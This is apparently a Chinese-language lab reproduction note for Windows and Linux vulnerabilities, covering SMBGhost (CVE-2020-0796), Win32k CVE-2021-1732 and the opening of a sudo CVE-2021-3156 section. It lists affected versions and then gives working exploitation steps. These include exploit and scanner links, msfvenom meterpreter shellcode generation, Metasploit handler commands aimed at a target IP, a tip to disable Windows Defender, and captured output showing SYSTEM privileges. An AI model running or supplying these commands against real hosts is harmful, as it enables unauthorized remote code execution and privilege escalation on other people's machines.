文章目录
windows
Windows SMB远程代码执行漏洞 CVE-2020-0796 (提权,远程RCE)
影响版本
SMB版本 v3.1.1
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
复现
msdn下载镜像
1、使用奇安信的漏洞扫描来探测
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
2、蓝屏
python3 CVE-2020-0796.py 192.168.170.137
3、本地提权EXP
运行应用程序后弹出cmd窗口为 system权限,https://github.com/danigargu/CVE-2020-0796
# windows
CVE-2020-0796 本地提权EXP\cve-2020-0796-local > cve-2020-0796-local.exe
# msf
run exploit/windows/local/cve_2020_0796_smbghost
4、CVE-2020-0796 远程利用代码:
# msfvenom生成reversed shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp lport=2333 -f py -o exp.py
# 将生成exp.py中的shellcode替换exploit.py中的shellcode,buf 要替换为 USER_PAYLOAD
# msf
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 2333
set rhost 192.168.170.137
exploit
# 执行脚本
python3 exploit.py -ip 192.168.170.137
测试了一下,关闭windows defender才能使用
注:监听端口如果一直收不到shell,重新运行一次即可。
Windows Win32k 本地提权漏洞 CVE-2021-1732
漏洞影响
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows Server, version 1909 (Server Core installation)
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1803 for x64-based Systems
使用:
C:\Users\itsme\Desktop> CVE-2021-1732.exe whoami
请按任意键继续. . .
CreateWnd
Hwnd:000403ac qwfirstEntryDesktop=0000028EE8B06470
BaseAddress:0000028EE8B06000 RegionSize=:0000000000016000
Hwnd:00020354 qwfirstEntryDesktop=0000028EE8B11190
BaseAddress:0000028EE8B11000 RegionSize=:000000000000B000
Hwnd:00020356 qwfirstEntryDesktop=0000028EE8B06790
... ...
qwFrist read=FFFFFD4404E6E7E0
qwSecond read=FFFF9D08390F10D0
qwSecond read=FFFFFD4401200000
qwFourth read=FFFFFD4402ECC220
qwFifth read=FFFF9D083B2AA080
qwSixth read=FFFF9D0839B44080
[*] Trying to execute whoami as SYSTEM
[+] ProcessCreated with pid 1512!
===============================
nt authority\system
linux
Linux sudo权限提升漏洞 CVE-2021-3156
下载ubuntu
http://mirrors.melbourne.co.uk/ubuntu-releases/20.04/